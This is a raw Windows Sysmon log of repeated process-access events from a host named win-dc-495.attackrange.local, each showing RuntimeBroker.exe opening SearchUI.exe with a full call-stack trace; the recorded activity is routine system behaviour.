13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.898{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
